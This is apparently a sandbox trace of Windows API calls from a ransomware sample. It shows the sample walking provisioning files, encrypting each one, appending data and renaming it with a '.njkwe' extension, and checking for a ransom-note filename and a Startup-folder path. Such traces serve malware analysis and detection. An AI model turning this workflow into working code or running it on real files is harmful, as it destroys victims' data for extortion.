0xc472e0 [0079.493] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0079.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\42__connections_cellular_velcom (belarus)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\42__connections_cellular_velcom (belarus)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.493] GetProcessHeap () returned 0xbe0000 [0079.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.493] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fb18e0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fb18e0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fb18e0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x27d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="430__C~1.PRO")) returned 1 [0079.494] lstrcmpiW (lpString1="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.494] lstrcmpiW (lpString1="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.494] lstrcmpiW (lpString1="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.494] lstrcmpiW (lpString1="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.494] lstrcmpiW (lpString1="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.494] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml") returned 155 [0079.494] StrStrIW (lpFirst="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.494] lstrcmpW (lpString1="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.494] lstrcmpW (lpString1="430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.494] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\430__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.494] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\430__connections_cellular_mtn (syria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.494] GetTickCount () returned 0x1154310 [0079.494] GetTickCount () returned 0x1154310 [0079.494] GetTickCount () returned 0x1154310 [0079.494] GetTickCount () returned 0x1154310 [0079.494] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.494] GetProcessHeap () returned 0xbe0000 [0079.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.494] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x27d, lpOverlapped=0x0) returned 1 [0079.496] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.496] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x27d, lpOverlapped=0x0) returned 1 [0079.496] GetProcessHeap () returned 0xbe0000 [0079.496] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.496] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.496] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.496] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.496] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.496] CloseHandle (hObject=0x43c) returned 1 [0079.496] GetProcessHeap () returned 0xbe0000 [0079.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.497] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 175 [0079.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\430__connections_cellular_mtn (syria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\430__Connections_Cellular_MTN (Syria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\430__connections_cellular_mtn (syria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.497] GetProcessHeap () returned 0xbe0000 [0079.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.497] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fb18e0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fb18e0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fb18e0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="431__C~1.PRO")) returned 1 [0079.497] lstrcmpiW (lpString1="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.497] lstrcmpiW (lpString1="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.497] lstrcmpiW (lpString1="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.497] lstrcmpiW (lpString1="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.497] lstrcmpiW (lpString1="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.497] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml") returned 160 [0079.498] StrStrIW (lpFirst="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.498] lstrcmpW (lpString1="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.498] lstrcmpW (lpString1="431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.498] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\431__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\431__connections_cellular_syriatel (syria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.498] GetTickCount () returned 0x1154320 [0079.498] GetTickCount () returned 0x1154320 [0079.498] GetTickCount () returned 0x1154320 [0079.498] GetTickCount () returned 0x1154320 [0079.498] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.498] GetProcessHeap () returned 0xbe0000 [0079.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.498] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0079.500] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.500] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0079.500] GetProcessHeap () returned 0xbe0000 [0079.500] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.500] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.500] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.500] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.500] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.500] CloseHandle (hObject=0x43c) returned 1 [0079.500] GetProcessHeap () returned 0xbe0000 [0079.500] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.500] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\431__connections_cellular_syriatel (syria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\431__Connections_Cellular_SyriaTel (Syria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\431__connections_cellular_syriatel (syria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.501] GetProcessHeap () returned 0xbe0000 [0079.501] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.501] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fb18e0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fb18e0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fb18e0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="432__C~1.PRO")) returned 1 [0079.501] lstrcmpiW (lpString1="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.501] lstrcmpiW (lpString1="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.501] lstrcmpiW (lpString1="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.501] lstrcmpiW (lpString1="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.501] lstrcmpiW (lpString1="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.501] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml") returned 161 [0079.501] StrStrIW (lpFirst="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.501] lstrcmpW (lpString1="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.501] lstrcmpW (lpString1="432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.501] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\432__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.501] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\432__connections_cellular_chunghwa (taiwan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.502] GetTickCount () returned 0x1154320 [0079.502] GetTickCount () returned 0x1154320 [0079.502] GetTickCount () returned 0x1154320 [0079.502] GetTickCount () returned 0x1154320 [0079.502] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.502] GetProcessHeap () returned 0xbe0000 [0079.502] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.502] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0079.503] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.504] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0079.504] GetProcessHeap () returned 0xbe0000 [0079.504] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.504] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.504] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.504] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.504] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.504] CloseHandle (hObject=0x43c) returned 1 [0079.504] GetProcessHeap () returned 0xbe0000 [0079.504] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.504] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0079.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\432__connections_cellular_chunghwa (taiwan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\432__Connections_Cellular_Chunghwa (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\432__connections_cellular_chunghwa (taiwan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.505] GetProcessHeap () returned 0xbe0000 [0079.505] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.505] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fb18e0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fb18e0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fb18e0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", cAlternateFileName="433__C~1.PRO")) returned 1 [0079.505] lstrcmpiW (lpString1="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.505] lstrcmpiW (lpString1="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.505] lstrcmpiW (lpString1="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.505] lstrcmpiW (lpString1="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.505] lstrcmpiW (lpString1="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.505] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml") returned 161 [0079.505] StrStrIW (lpFirst="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.505] lstrcmpW (lpString1="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.505] lstrcmpW (lpString1="433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.505] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\433__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\433__connections_cellular_chunghwa (taiwan)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.506] GetTickCount () returned 0x1154320 [0079.506] GetTickCount () returned 0x1154320 [0079.506] GetTickCount () returned 0x1154320 [0079.506] GetTickCount () returned 0x1154320 [0079.506] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.506] GetProcessHeap () returned 0xbe0000 [0079.506] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.506] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x344, lpOverlapped=0x0) returned 1 [0079.507] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.508] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x344, lpOverlapped=0x0) returned 1 